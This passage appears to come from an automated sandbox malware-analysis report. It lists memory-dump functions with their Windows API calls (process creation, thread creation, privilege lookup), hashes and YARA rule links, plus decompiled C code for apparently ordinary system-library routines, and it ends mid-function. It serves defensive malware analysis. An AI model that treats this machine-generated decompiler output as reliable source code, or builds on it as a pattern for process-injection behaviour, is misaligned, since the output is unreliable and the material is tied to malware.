                                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                        • Instruction ID: 7d18bf6126ccba7128eb2c42f61d6d8a022eec8a1117393b34c92481c4427880
                                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                        • Instruction Fuzzy Hash: 0C01DEB5E4020DBBDF10DBE4ED46FDDB7B89B54708F0041A9A90897242F671EB54CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000D853D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000D8594
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: 2293f82802332281dc033efc2facffa9a9663db34f0c076b0182cefea12bba51
                                                                                        • Instruction ID: a75dc5764fed22b962360bc82557fda04cf271cb9548e1374e33ad458673a5e2
                                                                                        • Opcode Fuzzy Hash: 2293f82802332281dc033efc2facffa9a9663db34f0c076b0182cefea12bba51
                                                                                        • Instruction Fuzzy Hash: AE01F2B6204109ABCB04CF88DC80DEB77B9AF8C310F258659FA4D97242C630E841CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000D8540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000D8594
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                        • Instruction ID: 306772bcae898da0b16c2b5ad3f274eea2f4599cd2382592f2efc9e3e31edd8a
                                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                        • Instruction Fuzzy Hash: A2015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258FA0D97251DA30E851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000D7010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CCCD0,?,?), ref: 000D704C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: ba2e822ebfdd2bb8a94d84977417bea092acd94697d130e792f27b2be464933f
                                                                                        • Instruction ID: 5294ea6b230c7a128f0c4618c66394f24165ebcff42a5fef99cad8444bddbd72
                                                                                        • Opcode Fuzzy Hash: ba2e822ebfdd2bb8a94d84977417bea092acd94697d130e792f27b2be464933f
                                                                                        • Instruction Fuzzy Hash: 74E06D333903043AE23066999C02FE7B39CCB81B21F540026FA0DEB2C2D595F80142A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000D700E, Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CCCD0,?,?), ref: 000D704C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: e907b5e1aa036cba6b0b9152039579730af75d90d6f581ff97081f185967ad24
                                                                                        • Instruction ID: fa415f27ef3fd06c207cb396a05d54d4e26b3ef0023c28ba21ee877440eb4626
                                                                                        • Opcode Fuzzy Hash: e907b5e1aa036cba6b0b9152039579730af75d90d6f581ff97081f185967ad24
                                                                                        • Instruction Fuzzy Hash: 5AE0DF3638030036E23066588D03FE773998B80B20F14002AFB09BB3C2D5A5F90242B4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000D8623, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFA2,000CCFA2,?,00000000,?,?), ref: 000D8660
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: 65c0a255bea344a70e3d48b22d725806081f48a12c3dfd57d0967044af93ffd7
                                                                                        • Instruction ID: 43a9941bebd1d7ee27ecf72aae9155954b836809c7696d270f56e51e794d6b90
                                                                                        • Opcode Fuzzy Hash: 65c0a255bea344a70e3d48b22d725806081f48a12c3dfd57d0967044af93ffd7
                                                                                        • Instruction Fuzzy Hash: 8CF0A0B1608204AFDB20EF59CC85EE7376EEF45390F048159F90D97242CA31A800CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000D8630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFA2,000CCFA2,?,00000000,?,?), ref: 000D8660
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                        • Instruction ID: 9a0400d5b13c241ccd2ba6797746d562d2159a7e0cf519e7269eb957e1188940
                                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                        • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49CC85EE737ADAF88650F018555FA0857282C930E8108BF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000CD407, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,000C7C63,?), ref: 000CD43B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 4a3218b8aa8467bd40c58409801de5a4b31735bc4eb98a0e7bd001dccad23a7a
                                                                                        • Instruction ID: 6604313e12d2aa3fed17caca12da6b9d399e9df34c18617040a5aba392a6a868
                                                                                        • Opcode Fuzzy Hash: 4a3218b8aa8467bd40c58409801de5a4b31735bc4eb98a0e7bd001dccad23a7a
                                                                                        • Instruction Fuzzy Hash: 72E02B363803003BE710EF949D03FDE73866B54701F190065F989EB3C3D720D4014120
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000CD410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,000C7C63,?), ref: 000CD43B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                        • Instruction ID: 5fbaa7c565d5a85a1fde5fe73e054035cf1b39f19f6efb154ef3ab856d398132
                                                                                        • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                        • Instruction Fuzzy Hash: 16D05E657503043BE610ABA89C03F6632C85B54B00F494064FA49973C3D960E5004561
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 01F68788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 94%
                                                                                        			E01F68788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E01F68460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E01F4E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E01F6718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E01F68460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E01F6718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E01F68460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E01F68460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E01F68460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E01F6718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E01F4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E01F42340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E01F5E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E01F4E2A8(_t322,  &_v68, _v16);
								if(E01F65553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E01F5E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E01F4E2A8(_t322,  &_v68, _t236);
								if(E01F65553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E01F6718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E01F4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E01F42340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E01F5E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E01F4E2A8(_v12,  &_v68, _v16);
							if(E01F65553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E01F5E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E01F4E2A8(_t322,  &_v68, _t269);
							if(E01F65553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E01F6718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E01F4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E01F42340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E01F5E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E01F4E2A8(_v12,  &_v68, _v16);
						if(E01F65553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E01F5E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E01F4E2A8(_t322,  &_v68, _t296);
						if(E01F65553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                        0x01f68788
                                                                                        0x01f68788
                                                                                        0x01f68791
                                                                                        0x01f68794
                                                                                        0x01f68798
                                                                                        0x01f6879b
                                                                                        0x01f6879e
                                                                                        0x01f687a1
                                                                                        0x01f687a4
                                                                                        0x01f687a7
                                                                                        0x01f687aa
                                                                                        0x01f687af
                                                                                        0x01fb1ad3
                                                                                        0x01f68b0a
                                                                                        0x01f68b0d
                                                                                        0x01f68b13
                                                                                        0x01f68b19
                                                                                        0x01f68b1f
                                                                                        0x01f68b25
                                                                                        0x01f68b2b
                                                                                        0x01f68b31
                                                                                        0x01f68b37
                                                                                        0x01f68b3d
                                                                                        0x01f68b46
                                                                                        0x01f68b46
                                                                                        0x01f687c6
                                                                                        0x01f687d0
                                                                                        0x01fb1ae0
                                                                                        0x01fb1ae6
                                                                                        0x01fb1af8
                                                                                        0x01fb1af8
                                                                                        0x01fb1afd
                                                                                        0x01fb1afe
                                                                                        0x01fb1b01
                                                                                        0x01fb1b06
                                                                                        0x01fb1b06
                                                                                        0x01f687d6
                                                                                        0x01f687f2
                                                                                        0x01f687f7
                                                                                        0x01f68807
                                                                                        0x01f6880a
                                                                                        0x01f6880f
                                                                                        0x01f68810
                                                                                        0x01f68813
                                                                                        0x01f68818
                                                                                        0x01f68818
                                                                                        0x01f6882c
                                                                                        0x01f68831
                                                                                        0x01f68838
                                                                                        0x01f68908
                                                                                        0x01f68920
                                                                                        0x01f689f0
                                                                                        0x01f68a08
                                                                                        0x01f68af6
                                                                                        0x01f68af6
                                                                                        0x01f68af8
                                                                                        0x01f68afb
                                                                                        0x01fb1beb
                                                                                        0x01fb1beb
                                                                                        0x01f68b04
                                                                                        0x01fb1bf8
                                                                                        0x01fb1c0e
                                                                                        0x01fb1c13
                                                                                        0x01fb1c16
                                                                                        0x01fb1c16
                                                                                        0x01fb1bf8
                                                                                        0x00000000
                                                                                        0x01f68b04
                                                                                        0x01f68a0e
                                                                                        0x01f68a11
                                                                                        0x01f68a14
                                                                                        0x01f68a15
                                                                                        0x01f68a18
                                                                                        0x01f68a22
                                                                                        0x01f68b59
                                                                                        0x01f68a28
                                                                                        0x01f68a3c
                                                                                        0x01f68a3c
                                                                                        0x01f68a42
                                                                                        0x01fb1bb0
                                                                                        0x01fb1b11
                                                                                        0x01fb1b11
                                                                                        0x00000000
                                                                                        0x01f68a48
                                                                                        0x01f68a51
                                                                                        0x01f68a5b
                                                                                        0x01f68a5e
                                                                                        0x01f68a61
                                                                                        0x01f68a69
                                                                                        0x01f68a69
                                                                                        0x01f68a6d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f68a74
                                                                                        0x01f68a7c
                                                                                        0x01f68a7d
                                                                                        0x01f68a91
                                                                                        0x01f68a93
                                                                                        0x01f68a93
                                                                                        0x01f68a98
                                                                                        0x01f68a9b
                                                                                        0x01f68aa1
                                                                                        0x01f68aa1
                                                                                        0x01f68aa4
                                                                                        0x01f68aaa
                                                                                        0x01f68ab1
                                                                                        0x01f68ac5
                                                                                        0x01f68ac7
                                                                                        0x01f68ac7
                                                                                        0x01f68ac5
                                                                                        0x01f68ace
                                                                                        0x01fb1bc9
                                                                                        0x01fb1bce
                                                                                        0x01fb1bd2
                                                                                        0x01fb1bd2
                                                                                        0x01f68ad8
                                                                                        0x01f68aeb
                                                                                        0x01f68aeb
                                                                                        0x01f68af0
                                                                                        0x01f68af4
                                                                                        0x00000000
                                                                                        0x01f68af4
                                                                                        0x01f68a42
                                                                                        0x01f68926
                                                                                        0x01f68929
                                                                                        0x01f6892c
                                                                                        0x01f6892d
                                                                                        0x01f68930
                                                                                        0x01f68935
                                                                                        0x01f6893a
                                                                                        0x01f68b51
                                                                                        0x01f68940
                                                                                        0x01f68954
                                                                                        0x01f68954
                                                                                        0x01f6895a
                                                                                        0x01fb1b63
                                                                                        0x00000000
                                                                                        0x01f68960
                                                                                        0x01f68969
                                                                                        0x01f68973
                                                                                        0x01f68976
                                                                                        0x01f68979
                                                                                        0x01f6897e
                                                                                        0x01f68981
                                                                                        0x01f68981
                                                                                        0x01f68986
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fb1b6e
                                                                                        0x01fb1b74
                                                                                        0x01fb1b7b
                                                                                        0x01fb1b8f
                                                                                        0x01fb1b91
                                                                                        0x01fb1b91
                                                                                        0x01fb1b99
                                                                                        0x01fb1b9c
                                                                                        0x01fb1ba2
                                                                                        0x01fb1ba2
                                                                                        0x01f6898c
                                                                                        0x01f68992
                                                                                        0x01f68999
                                                                                        0x01f689ad
                                                                                        0x01fb1ba8
                                                                                        0x01fb1ba8
                                                                                        0x01f689ad
                                                                                        0x01f689b6
                                                                                        0x01f689c8
                                                                                        0x01f689cd
                                                                                        0x01f689d0
                                                                                        0x01f689d0
                                                                                        0x01f689d6
                                                                                        0x01f689e8
                                                                                        0x01f689e8
                                                                                        0x01f689ed
                                                                                        0x00000000
                                                                                        0x01f689ed
                                                                                        0x01f6895a
                                                                                        0x01f6883e
                                                                                        0x01f68841
                                                                                        0x01f68844
                                                                                        0x01f68845
                                                                                        0x01f68848
                                                                                        0x01f6884d
                                                                                        0x01f68852
                                                                                        0x01f68b49
                                                                                        0x01f68858
                                                                                        0x01f6886c
                                                                                        0x01f6886c
                                                                                        0x01f68872
                                                                                        0x01fb1b0e
                                                                                        0x00000000
                                                                                        0x01f68878
                                                                                        0x01f68881
                                                                                        0x01f6888b
                                                                                        0x01f6888e
                                                                                        0x01f68891
                                                                                        0x01f68896
                                                                                        0x01f68899
                                                                                        0x01f68899
                                                                                        0x01f6889e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fb1b21
                                                                                        0x01fb1b27
                                                                                        0x01fb1b2e
                                                                                        0x01fb1b42
                                                                                        0x01fb1b44
                                                                                        0x01fb1b44
                                                                                        0x01fb1b4c
                                                                                        0x01fb1b4f
                                                                                        0x01fb1b55
                                                                                        0x01fb1b55
                                                                                        0x01f688a4
                                                                                        0x01f688aa
                                                                                        0x01f688b1
                                                                                        0x01f688c5
                                                                                        0x01fb1b5b
                                                                                        0x01fb1b5b
                                                                                        0x01f688c5
                                                                                        0x01f688ce
                                                                                        0x01f688e0
                                                                                        0x01f688e5
                                                                                        0x01f688e8
                                                                                        0x01f688e8
                                                                                        0x01f688ee
                                                                                        0x01f68900
                                                                                        0x01f68900
                                                                                        0x01f68905
                                                                                        0x00000000
                                                                                        0x01f68905

                                                                                        APIs
                                                                                        Strings
                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 01F687E6
                                                                                        • WindowsExcludedProcs, xrefs: 01F687C1
                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 01F68827
                                                                                        • Kernel-MUI-Language-SKU, xrefs: 01F689FC
                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 01F68914
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: _wcspbrk
                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                        • API String ID: 402402107-258546922
                                                                                        • Opcode ID: c81bc30f0ada6817cdc5d5bbec17627a8f553532efa07266f798021b9359fffe
                                                                                        • Instruction ID: 67bdbf1e80b046df04489fd462e83554ca14b2317006a8bbff994e3c4997e93d
                                                                                        • Opcode Fuzzy Hash: c81bc30f0ada6817cdc5d5bbec17627a8f553532efa07266f798021b9359fffe
                                                                                        • Instruction Fuzzy Hash: ECF1E7B2D0020AEFDF11DF99CD809EEBBB9FF18344F14446AE605A7211E7369A45DB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F813CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 38%
                                                                                        			E01F813CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E01F77707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x1f42926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E01F77707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x1f49cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E01F77707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E01F77707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E01F77707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E01F77707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
